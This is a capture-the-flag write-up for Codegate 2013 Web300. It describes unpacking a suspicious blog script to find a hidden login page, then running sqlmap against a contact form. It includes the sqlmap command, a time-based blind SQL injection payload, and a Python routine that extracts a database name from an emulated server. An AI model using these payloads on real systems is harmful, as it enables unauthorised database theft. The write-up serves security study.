Codegate2013 Web300 Writeup

This problem first presents a letter in which the author asks Sherlock to find someone connected to a hacking case. The letter gives a blog address as the clue for finding the wanted person.

Analyzing the blog's JavaScript, we found js/secret.js rather suspicious. Unpacking and decrypting it gives the following code:

    $(document).ready(function() {          // argument of the packer's eval() wrapper
        var cnt = 0;
        $('a.S').click(function() {         // the “Grey” logo link
            cnt++;
            if (cnt == 10) {
                $('#popup').bPopup({
                    contentContainer: '.content',
                    loadUrl: './d56b699830e77ba53855679cb1d252da.php'
                });
                cnt = 0;
            }
        });
    });

This discloses a hidden login page, http://58.229.122.17:2218/d56b699830e77ba53855679cb1d252da.php (the file name is the MD5 of “login”). It can be reached by clicking the “Grey” logo ten times.

Then we find a POST form at http://58.229.122.17:2218/contact.php and run sqlmap against it to check whether it is vulnerable to SQL injection. Luckily it is.

python sqlmap.py -u "http://58.229.122.17:2218/contact.php" --data="your_name=1&your_email=1@1.com&question=2&your_message=1&contact_submitted=send"

sqlmap identifies a time-based blind SQL injection in the “question” parameter. We then enumerate the databases. Time-based blind SQLi is slow and sensitive to network latency, because every bit is inferred from how long the server takes to answer, so do not load your network connection while it runs, or the timing measurements become unreliable.
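To show what sqlmap is doing under the hood here, this is an added example (not code from the original writeup or from sqlmap) that extracts DATABASE() through a time-based blind oracle, one character at a time with a binary search on its ordinal. The server is a constructed stand-in for contact.php that emulates only the MySQL semantics the payload relies on; the payload shape assumes the “question” value is used in a numeric context, and the name the stand-in holds is simply the one the writeup later found.

```python
import re
import time

# Constructed stand-in for the vulnerable contact.php handler (not the real
# server): the "question" field is concatenated into the SQL, so a payload of the
# form  2 AND IF(ORD(SUBSTRING(DATABASE(),p,1))>n,SLEEP(s),0)  turns the response
# time into a one-bit oracle. Only the MySQL behaviour that payload relies on is
# emulated here.
SECRET_DB = "the_grey"   # held by the "server"; the attacker side never reads it directly

PAYLOAD_RE = re.compile(
    r"^2 AND IF\(ORD\(SUBSTRING\(DATABASE\(\),(\d+),1\)\)>(\d+),SLEEP\(([\d.]+)\),0\)$"
)

def fake_contact_php(question):
    """Emulate the server: sleep iff the injected condition evaluates true."""
    m = PAYLOAD_RE.match(question)
    if m is None:
        return "thanks for contacting us"          # benign input, no delay
    pos, threshold, delay = int(m.group(1)), int(m.group(2)), float(m.group(3))
    # MySQL SUBSTRING is 1-indexed and returns '' past the end; ORD('') = 0
    ch = SECRET_DB[pos - 1] if 1 <= pos <= len(SECRET_DB) else ""
    if (ord(ch) if ch else 0) > threshold:
        time.sleep(delay)
    return "thanks for contacting us"

DELAY = 0.05   # seconds; sqlmap's --time-sec default is 5, shortened for the demo

def oracle(pos, threshold, send=fake_contact_php, delay=DELAY):
    """Return True when ORD(char at pos) > threshold, judged by response time."""
    payload = f"2 AND IF(ORD(SUBSTRING(DATABASE(),{pos},1))>{threshold},SLEEP({delay}),0)"
    start = time.monotonic()
    send(payload)
    # Decision threshold halfway between the fast and the slow branch; on a
    # congested link the fast branch drifts towards this line and bits flip.
    return time.monotonic() - start >= delay / 2

def extract_database_name(send=fake_contact_php, max_len=64):
    """Recover DATABASE() character by character, 7 probes per character."""
    name = ""
    for pos in range(1, max_len + 1):
        lo, hi = 0, 127            # invariant: lo <= ORD(char) <= hi
        while lo < hi:
            mid = (lo + hi) // 2
            if oracle(pos, mid, send):
                lo = mid + 1       # char > mid
            else:
                hi = mid           # char <= mid
        if lo == 0:                # ORD('') == 0: we ran past the end of the string
            break
        name += chr(lo)
    return name

if __name__ == "__main__":
    print(extract_database_name())
```

Each recovered character costs seven round trips, each one a full SLEEP on the true branch, which is why the real run against the challenge server took so long and why extra traffic on the same link corrupts the result: a delayed "fast" response is indistinguishable from a deliberate SLEEP.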

The database “the_grey” is found, with two tables, “contact” and “user”. “user” has three columns, “no”, “id” and “password” (MD5 hashes), and five rows. Using this information we log in to the blog, and on the page http://58.229.122.17:2218/my_page.php?user=victor we find the one who intends to hack Hound Co.,Ltd. and the time the company is hacked.

That’s the key.